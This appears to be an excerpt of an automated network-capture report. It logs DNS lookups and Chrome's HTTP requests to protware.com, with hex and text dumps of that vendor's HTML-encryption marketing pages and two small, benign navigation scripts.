              Nov 30, 2024 00:40:16.389604092 CET53576571.1.1.1192.168.2.4
              Nov 30, 2024 00:40:30.665803909 CET138138192.168.2.4192.168.2.255
              Nov 30, 2024 00:40:30.736275911 CET5323253192.168.2.41.1.1.1
              Nov 30, 2024 00:40:30.736546040 CET5620953192.168.2.41.1.1.1
              Nov 30, 2024 00:40:30.738065958 CET53603341.1.1.1192.168.2.4
              Nov 30, 2024 00:40:31.754769087 CET5699453192.168.2.41.1.1.1
              Nov 30, 2024 00:40:31.754919052 CET6299053192.168.2.41.1.1.1
              Nov 30, 2024 00:40:31.987168074 CET53532321.1.1.1192.168.2.4
              Nov 30, 2024 00:40:31.987509966 CET53569941.1.1.1192.168.2.4
              Nov 30, 2024 00:40:31.987922907 CET53629901.1.1.1192.168.2.4
              Nov 30, 2024 00:40:31.988097906 CET53562091.1.1.1192.168.2.4
              Nov 30, 2024 00:40:33.804081917 CET5703953192.168.2.41.1.1.1
              Nov 30, 2024 00:40:33.804244995 CET5670253192.168.2.41.1.1.1
              Nov 30, 2024 00:40:33.942066908 CET53570391.1.1.1192.168.2.4
              Nov 30, 2024 00:40:33.942986012 CET53567021.1.1.1192.168.2.4
              Nov 30, 2024 00:40:49.565618992 CET53609201.1.1.1192.168.2.4
              Nov 30, 2024 00:41:09.799721956 CET53574101.1.1.1192.168.2.4
              Nov 30, 2024 00:41:12.077994108 CET53597511.1.1.1192.168.2.4
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Nov 30, 2024 00:40:14.128989935 CET192.168.2.41.1.1.10x4d37Standard query (0)www.google.comA (IP address)IN (0x0001)false
              Nov 30, 2024 00:40:14.129131079 CET192.168.2.41.1.1.10x2c7bStandard query (0)www.google.com65IN (0x0001)false
              Nov 30, 2024 00:40:15.981487036 CET192.168.2.41.1.1.10x650Standard query (0)noisefreqs.comA (IP address)IN (0x0001)false
              Nov 30, 2024 00:40:15.981887102 CET192.168.2.41.1.1.10x2cb9Standard query (0)noisefreqs.com65IN (0x0001)false
              Nov 30, 2024 00:40:30.736275911 CET192.168.2.41.1.1.10xbe99Standard query (0)www.protware.comA (IP address)IN (0x0001)false
              Nov 30, 2024 00:40:30.736546040 CET192.168.2.41.1.1.10x1702Standard query (0)www.protware.com65IN (0x0001)false
              Nov 30, 2024 00:40:31.754769087 CET192.168.2.41.1.1.10xc155Standard query (0)www.protware.comA (IP address)IN (0x0001)false
              Nov 30, 2024 00:40:31.754919052 CET192.168.2.41.1.1.10xdb85Standard query (0)www.protware.com65IN (0x0001)false
              Nov 30, 2024 00:40:33.804081917 CET192.168.2.41.1.1.10x40a7Standard query (0)www.protware.comA (IP address)IN (0x0001)false
              Nov 30, 2024 00:40:33.804244995 CET192.168.2.41.1.1.10x5ecaStandard query (0)www.protware.com65IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Nov 30, 2024 00:40:14.266330957 CET1.1.1.1192.168.2.40x2c7bNo error (0)www.google.com65IN (0x0001)false
              Nov 30, 2024 00:40:14.266598940 CET1.1.1.1192.168.2.40x4d37No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
              Nov 30, 2024 00:40:16.376904964 CET1.1.1.1192.168.2.40x650No error (0)noisefreqs.com166.1.209.92A (IP address)IN (0x0001)false
              Nov 30, 2024 00:40:31.987168074 CET1.1.1.1192.168.2.40xbe99No error (0)www.protware.comprotware.comCNAME (Canonical name)IN (0x0001)false
              Nov 30, 2024 00:40:31.987168074 CET1.1.1.1192.168.2.40xbe99No error (0)protware.com68.233.44.128A (IP address)IN (0x0001)false
              Nov 30, 2024 00:40:31.987509966 CET1.1.1.1192.168.2.40xc155No error (0)www.protware.comprotware.comCNAME (Canonical name)IN (0x0001)false
              Nov 30, 2024 00:40:31.987509966 CET1.1.1.1192.168.2.40xc155No error (0)protware.com68.233.44.128A (IP address)IN (0x0001)false
              Nov 30, 2024 00:40:31.987922907 CET1.1.1.1192.168.2.40xdb85No error (0)www.protware.comprotware.comCNAME (Canonical name)IN (0x0001)false
              Nov 30, 2024 00:40:31.988097906 CET1.1.1.1192.168.2.40x1702No error (0)www.protware.comprotware.comCNAME (Canonical name)IN (0x0001)false
              Nov 30, 2024 00:40:33.942066908 CET1.1.1.1192.168.2.40x40a7No error (0)www.protware.comprotware.comCNAME (Canonical name)IN (0x0001)false
              Nov 30, 2024 00:40:33.942066908 CET1.1.1.1192.168.2.40x40a7No error (0)protware.com68.233.44.128A (IP address)IN (0x0001)false
              Nov 30, 2024 00:40:33.942986012 CET1.1.1.1192.168.2.40x5ecaNo error (0)www.protware.comprotware.comCNAME (Canonical name)IN (0x0001)false
              • noisefreqs.com
              • https:
              • fs.microsoft.com
              • slscr.update.microsoft.com
              • otelrules.azureedge.net
              • www.protware.com
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.44975268.233.44.128803168C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              Nov 30, 2024 00:40:32.109298944 CET431OUTGET / HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              Upgrade-Insecure-Requests: 1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:33.363440990 CET1236INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:33 GMT
              Content-Type: text/html
              Content-Length: 11654
              Connection: keep-alive
              Last-Modified: Fri, 03 Feb 2023 15:57:08 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 6e 63 72 79 70 74 20 48 54 4d 4c 20 73 6f 75 72 63 65 2c 20 4a 61 76 61 73 63 72 69 70 74 2c 20 41 53 50 2e 20 50 72 6f 74 65 63 74 20 6c 69 6e 6b 73 20 26 61 6d 70 3b 20 69 6d 61 67 65 73 2e 20 48 54 4d 4c 20 65 6e 63 72 79 70 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 4c 49 4e 4b 20 52 45 4c 3d 22 53 48 4f 52 54 43 55 54 20 49 43 4f 4e 22 20 48 52 45 46 3d 22 65 6e 63 72 79 70 74 5f 68 74 6d 6c 2e 69 63 6f 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 63 72 79 70 74 20 [TRUNCATED]
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Encrypt HTML source, Javascript, ASP. Protect links &amp; images. HTML encryption</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><LINK REL="SHORTCUT ICON" HREF="encrypt_html.ico"><meta name="keywords" content="Encrypt html,protect,source,web,page,javascript,asp,vbscript,code,email,scramble,secure"><meta name="description" content="Encrypt html source, protect javascript, asp encryption, web site password protection email scramble"><meta name="page-topic" content="Encrypt HTML source code, protect website. Encryption of ASP, Javascript, html"><meta name="author" content="ProtWare, Inc. The recognized leader in web site and intellectual property protection since 1997"><meta name="subject" content="password protect web site source code encryption"><meta name="page-type" content="tool for encryption of html, asp, vbscript, javascript code"><script language="JavaScript
              Nov 30, 2024 00:40:33.363594055 CET1236INData Raw: 22 20 73 72 63 20 3d 20 22 6d 6d 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 34 33 2c 2a 22 20 63 6f 6c 73 3d 22 2a 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 4e 4f 22
              Data Ascii: " src = "mm.js"></script></head><frameset rows="143,*" cols="*" frameborder="NO" border="0" framespacing="0"> <frame name="top" scrolling="NO" noresize src="menu.htm" > <frameset cols="43,*" frameborder="NO" border="0" framespacing="0"
              Nov 30, 2024 00:40:33.363605976 CET1236INData Raw: 62 65 20 61 66 66 65 63 74 65 64 20 69 6e 20 61 6e 79 20 77 61 79 20 2d 20 74 68 65 79 20 77 69 6c 6c 20 6c 6f 6f 6b 20 65 78 61 63 74 6c 79 20 0a 20 20 74 68 65 20 73 61 6d 65 20 61 73 20 62 65 66 6f 72 65 20 69 6e 20 61 6e 79 20 62 72 6f 77 73
              Data Ascii: be affected in any way - they will look exactly the same as before in any browser.</p><br><p>Visit our partner site, <a href="http://www.encrypt-html.com">Encrypt HTML leader Code Protection Technologies</a></p><p><img src="encrypt_html.g
              Nov 30, 2024 00:40:33.364166975 CET1236INData Raw: 72 6f 68 69 62 69 74 65 64 20 0a 20 20 2d 20 61 20 76 65 72 79 20 75 73 65 66 75 6c 20 66 65 61 74 75 72 65 20 74 6f 20 70 72 65 76 65 6e 74 20 6f 70 65 6e 69 6e 67 20 6f 66 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 69 6e 20 66 72 61 6d 65 73 29
              Data Ascii: rohibited - a very useful feature to prevent opening of your website in frames). </p> <p> Visit our Yahoo.com group or MSN.com group to discuss web intellectual property security related issues.<a href="http://www.protware.com/faq1.htm
              Nov 30, 2024 00:40:33.364181042 CET896INData Raw: 6e 20 61 64 64 2d 6f 6e 20 70 72 6f 76 69 64 65 73 20 65 6e 68 61 6e 63 65 64 20 3c 62 3e 3c 61 20 68 72 65 66 3d 22 69 6d 61 67 65 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 68 74 6d 22 3e 69 6d 61 67 65 20 20 0a 20 20 70 72 6f 74 65 63 74 69 6f 6e 3c
              Data Ascii: n add-on provides enhanced <b><a href="image_protection.htm">image protection</a></b> for each picture in *.gif, *.jpg , *.png and *.bmp format. Theft of website images is a major concern for all webmasters who have a high quality pictu
              Nov 30, 2024 00:40:33.364192963 CET1236INData Raw: 74 6f 20 73 61 79 20 48 54 4d 4c 47 75 61 72 64 69 61 6e 20 69 73 20 0a 20 20 74 68 65 20 62 65 73 74 20 70 72 6f 64 75 63 74 20 6f 66 20 69 74 73 20 6b 69 6e 64 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 64 61 79 2e 20 41 63 74 75 61 6c 6c 79 20 6d
              Data Ascii: to say HTMLGuardian is the best product of its kind available today. Actually most of them consider it the only solution to provide real security for your intellectual property - either posted online or distributed offline.</p> <br><p
              Nov 30, 2024 00:40:33.365108967 CET1236INData Raw: 72 6f 74 65 63 74 20 48 54 4d 4c 20 66 69 6c 65 73 3c 2f 61 3e 20 69 6e 20 61 6e 20 65 78 74 72 65 6d 65 6c 79 20 73 65 63 75 72 65 20 77 61 79 2e 20 56 65 72 73 69 6f 6e 73 20 36 2e 34 20 61 6e 64 20 6c 61 74 65 72 20 69 6e 63 6c 75 64 65 20 0a
              Data Ascii: rotect HTML files</a> in an extremely secure way. Versions 6.4 and later include the new Ultra - Strong password protection utility. It can <b>password protect html</b> files with up to 384 bit keys. Just for a comparison, for online cre
              Nov 30, 2024 00:40:33.365118980 CET448INData Raw: 77 69 6c 6c 20 61 6c 73 6f 20 61 76 6f 69 64 20 61 6c 6c 20 0a 20 20 6d 61 69 6c 20 63 65 6e 73 6f 72 73 68 69 70 20 75 74 69 6c 69 74 69 65 73 20 77 68 69 63 68 20 6d 61 79 20 6f 74 68 65 72 77 69 73 65 20 62 6c 6f 63 6b 20 6d 65 73 73 61 67 65
              Data Ascii: will also avoid all mail censorship utilities which may otherwise block messages sent by you and make them unavailable for some of the recipients.<br> <br> The program has many advanced batch processing features - you can protect not
              Nov 30, 2024 00:40:33.365128040 CET1236INData Raw: 74 65 63 74 20 74 68 65 69 72 20 63 6f 64 65 2c 20 69 6d 61 67 65 73 20 61 6e 64 20 6f 74 68 65 72 20 69 6e 74 65 6c 6c 65 63 74 75 61 6c 20 70 72 6f 70 65 72 74 79 2c 20 74 68 65 72 65 20 61 72 65 20 74 6f 6e 73 20 6f 66 20 6f 74 68 65 72 20 66
              Data Ascii: tect their code, images and other intellectual property, there are tons of other features - like the option to compress and optimize your source, which results in lightning fast page downloads. Read a detailed overview of all <a href="featu
              Nov 30, 2024 00:40:33.365139008 CET1236INData Raw: 73 65 20 2d 20 69 6e 20 74 6f 64 61 79 27 73 20 68 69 67 68 6c 79 20 63 6f 6d 70 65 74 69 74 69 76 65 20 0a 20 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 2c 20 74 68 69 73 20 69 73 20 73 6f 6d 65 74 68 69 6e 67 20 73 65 72 69 6f 75 73 20 77 65 62 20 64
              Data Ascii: se - in today's highly competitive environment, this is something serious web designers and developers would like to avoid.<br> That's why more and more web designers and developers are now looking for a flexible and easy to use but po
              Nov 30, 2024 00:40:33.483560085 CET656INData Raw: 68 69 73 20 63 61 6e 20 69 6e 63 72 65 61 73 65 20 74 68 65 20 6e 75 6d 62 65 72 20 0a 20 20 6f 66 20 76 69 73 69 74 73 20 74 6f 20 79 6f 75 72 20 73 69 74 65 20 62 79 20 73 65 76 65 72 61 6c 20 74 69 6d 65 73 21 3c 62 72 3e 0a 20 20 43 68 65 63
              Data Ascii: his can increase the number of visits to your site by several times!<br> Check some <a href="http://www.protware.com/tech/"> security, encryption and image protection related tips</a> </p> <p> To <b>encrypt html</b> and secure our
              Nov 30, 2024 00:40:33.803440094 CET475OUTGET /blank.htm HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              Upgrade-Insecure-Requests: 1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Referer: http://www.protware.com/
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:34.165424109 CET716INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:33 GMT
              Content-Type: text/html
              Content-Length: 484
              Connection: keep-alive
              Last-Modified: Fri, 03 Feb 2023 15:51:32 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 48 54 4d 4c 20 47 75 61 72 64 69 61 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 49 45 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 20 3d 20 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 20 3d 20 22 66 72 6d 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 [TRUNCATED]
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>HTML Guardian</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link rel="stylesheet" href="styleIE.css" type="text/css"><script language = "Javascript" src = "frm.js"></script></head><body bgcolor="#FFFFFF" text="#000000">...Page was last updated on : February 03, 2023 -->...revision: pw_791XUAT_223fl_AND_NS09221h-175sec_L7004_newhcU2 --></body></html>
              Nov 30, 2024 00:40:34.189615011 CET318OUTGET /frm.js HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Referer: http://www.protware.com/home.htm
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:34.549918890 CET1061INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:34 GMT
              Content-Type: text/javascript
              Content-Length: 823
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 69 66 20 28 28 70 61 72 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 3d 20 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 20 26 26 20 77 69 6e 64 6f 77 2e 6e 61 6d 65 21 3d 27 71 61 7a 78 73 77 65 64 63 27 29 7b 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 64 65 66 61 75 6c 74 2e 68 74 6d 27 29 7d 3b 76 61 72 20 6e 38 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 72 70 6c 63 28 69 6e 70 66 2c 66 65 29 7b 0d 0a 09 66 65 41 3d 41 72 72 61 79 28 27 68 74 6d 27 2c 27 68 74 6d 6c 27 2c 27 61 73 70 27 2c 27 70 68 70 27 2c 27 73 68 74 6d 6c 27 29 3b 0d 0a 09 6e 75 3d 69 6e 70 66 2b 27 2e 27 2b 66 65 41 5b 66 65 5d 3b 0d 0a 09 64 4f 62 6a 3d 27 6c 6f 63 61 74 69 6f 6e 27 3b 20 64 56 61 6c 3d 27 27 3b 20 64 41 63 74 3d 27 2e 72 65 70 6c 61 63 65 28 22 27 3b 20 64 43 6c 3d 27 22 29 27 3b 20 64 48 65 78 3d 27 30 78 42 42 27 3b 0d 0a 09 65 76 61 6c 28 64 4f 62 6a 2b 64 41 63 74 2b 64 56 61 6c 2b 6e 75 2b 64 43 6c 29 3b 09 09 09 09 09 09 09 09 09 09 20 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e [TRUNCATED]
              Data Ascii: if ((parent.location.href == self.location.href) && window.name!='qazxswedc'){location.replace('default.htm')};var n8;function rplc(inpf,fe){feA=Array('htm','html','asp','php','shtml');nu=inpf+'.'+feA[fe];dObj='location'; dVal=''; dAct='.replace("'; dCl='")'; dHex='0xBB';eval(dObj+dAct+dVal+nu+dCl); }function rwl(inp){if(document.getElementById){nulk= Array('k-data::3','source_browser::9','security-set_6::2','v_debug_a::0','directory_7::2','corp_mngr_7::1','compare_encrypt_7::1','corp_data::0','security_audit_6::3','compare_ipr::4');feM=Array('htm','html','asp','php','shtml');c=n8?'obj=':'href=';for(i=0;i<inp.length;i++){a=nulk[inp[i]].slice(0,nulk[inp[i]].indexOf('::'));b=nulk[inp[i]].slice(nulk[inp[i]].indexOf('::')+2);eval("document.getElementById(inp[i])"+"."+c+"a+'.'+feM[b]");}}}
              Nov 30, 2024 00:40:34.564838886 CET381OUTGET /next.gif HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
              Referer: http://www.protware.com/home.htm
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:34.955277920 CET996INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:34 GMT
              Content-Type: image/gif
              Content-Length: 787
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Data Raw: 47 49 46 38 39 61 1e 00 1e 00 e6 ff 00 14 13 13 72 6d 6d 4a 47 47 c0 c0 c0 29 28 28 c0 be be ff ff ff e8 e8 e8 df df df de de de dd dd dd db db db d2 d2 d2 cf cf cf cd cd cd cb cb cb ca ca ca c5 c5 c5 c4 c4 c4 c1 c1 c1 bc bc bc b9 b9 b9 b7 b7 b7 b5 b5 b5 b3 b3 b3 b1 b1 b1 af af af ad ad ad a9 a9 a9 a7 a7 a7 a6 a6 a6 a5 a5 a5 9f 9f 9f 9b 9b 9b 9a 9a 9a 96 96 96 94 94 94 8e 8e 8e 8d 8d 8d 8c 8c 8c 8a 8a 8a 87 87 87 86 86 86 84 84 84 80 80 80 7c 7c 7c 7b 7b 7b 79 79 79 78 78 78 77 77 77 76 76 76 75 75 75 74 74 74 71 71 71 70 70 70 6f 6f 6f 6e 6e 6e 6d 6d 6d 6a 6a 6a 68 68 68 66 66 66 65 65 65 64 64 64 63 63 63 62 62 62 61 61 61 60 60 60 5d 5d 5d 5b 5b 5b 5a 5a 5a 59 59 59 58 58 58 56 56 56 54 54 54 53 53 53 52 52 52 51 51 51 4c 4c 4c 4b 4b 4b 4a 4a 4a 49 49 49 48 48 48 47 47 47 46 46 46 45 45 45 42 42 42 3e 3e 3e 3d 3d 3d 3c 3c 3c 3a 3a 3a 38 38 38 37 37 37 34 34 34 33 33 33 32 32 32 30 30 30 2f 2f 2f 2e 2e 2e 2a 2a 2a 29 29 29 28 28 28 22 22 22 21 21 21 20 20 20 1f 1f 1f 1e 1e 1e 1d 1d 1d 1b 1b 1b 19 [TRUNCATED]
              Data Ascii: GIF89armmJGG)((|||{{{yyyxxxwwwvvvuuutttqqqpppooonnnmmmjjjhhhfffeeedddcccbbbaaa```]]][[[ZZZYYYXXXVVVTTTSSSRRRQQQLLLKKKJJJIIIHHHGGGFFFEEEBBB>>>===<<<:::888777444333222000///...***)))((("""!!! !,@;?'-Pf9/yHcvwwx3ndDxxD54&#%0FZjqu[eca\$H<*:LQXbmqtyn.5 "8Ugqvx61YKv(<qbj58ds+)H>yC*:o`r)E84&I3p1(|\IcZCCRdh@1CQ!pbPAS4Yn%c7`/02(7l&8C,g,PKJCDR;l)[P#;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.44975368.233.44.128803168C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              Nov 30, 2024 00:40:33.384201050 CET309OUTGET /mm.js HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Referer: http://www.protware.com/
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:33.781971931 CET900INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:33 GMT
              Content-Type: text/javascript
              Content-Length: 662
              Connection: keep-alive
              Last-Modified: Thu, 05 Apr 2007 14:17:09 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 42 72 77 73 72 20 3d 20 22 49 45 22 7d 0d 0a 69 66 28 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 29 7b 42 72 77 73 72 20 3d 20 22 4e 4e 34 22 7d 0d 0a 69 66 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 20 26 26 20 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 29 7b 42 72 77 73 72 20 3d 20 22 4e 4e 36 22 7d 0d 0a 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 61 70 70 4e 61 6d 65 20 3d 3d 22 4f 70 65 72 61 22 29 7b 42 72 77 73 72 20 3d 20 22 4f 70 65 72 61 22 7d 0d 0a 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 4d 4d 5f 72 65 6c 6f 61 64 50 61 67 65 28 69 6e 69 74 29 20 7b 20 20 2f 2f 72 65 6c 6f 61 64 73 20 74 68 65 20 77 69 6e 64 6f 77 20 69 66 20 4e 61 76 34 20 72 65 73 69 7a 65 64 0d 0a 20 20 69 66 20 28 69 6e 69 74 3d 3d 74 72 75 65 29 20 77 69 74 68 20 28 6e 61 76 69 67 61 74 6f 72 29 20 7b 69 66 20 28 28 61 70 70 4e 61 6d 65 3d 3d 22 4e 65 74 73 63 61 70 65 22 29 26 26 28 70 61 72 73 65 49 6e 74 28 61 70 70 56 65 72 73 69 6f 6e 29 [TRUNCATED]
              Data Ascii: if(document.all){Brwsr = "IE"}if(document.layers){Brwsr = "NN4"}if(document.getElementById && window.sidebar){Brwsr = "NN6"}if(navigator.appName =="Opera"){Brwsr = "Opera"}function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();}MM_reloadPage(true);/*if(Brwsr != "NN4"){window.moveTo(0,0);window.resizeTo(screen.availWidth,screen.availHeight) }*/
              Nov 30, 2024 00:40:33.803076029 CET474OUTGET /menu.htm HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              Upgrade-Insecure-Requests: 1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Referer: http://www.protware.com/
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:34.163712025 CET1236INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:33 GMT
              Content-Type: text/html
              Content-Length: 7129
              Connection: keep-alive
              Last-Modified: Fri, 03 Feb 2023 15:51:32 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 6e 63 72 79 70 74 20 48 54 4d 4c 2c 20 4a 61 76 61 73 63 72 69 70 74 2c 20 41 53 50 2e 20 50 72 6f 74 65 63 74 20 6c 69 6e 6b 73 20 26 61 6d 70 3b 20 69 6d 61 67 65 73 2e 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 20 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 63 72 79 70 74 2c 68 74 6d 6c 2c 70 72 6f 74 65 63 74 2c 73 6f 75 72 63 65 2c 77 65 62 2c 70 61 67 65 2c 6a 61 76 61 73 63 72 69 70 74 2c 61 73 70 2c 76 62 73 63 72 69 70 74 2c 63 6f 64 65 [TRUNCATED]
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Encrypt HTML, Javascript, ASP. Protect links &amp; images. HTML Encrypt ion</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><meta name="keywords" content="Encrypt,html,protect,source,web,page,javascript,asp,vbscript,code,email,scramble,secure"><meta name="description" content="Encrypt html source, protect javascript, asp encryption, web site password protection email scramble"><meta name="page-topic" content="Encrypt HTML source code, protect website. Encryption of ASP, Javascript, html"><meta name="author" content="ProtWare, Inc. The recognized leader in web site and intellectual property protection since 1997"><meta name="subject" content="password protect web site source code encryption"><meta name="title" 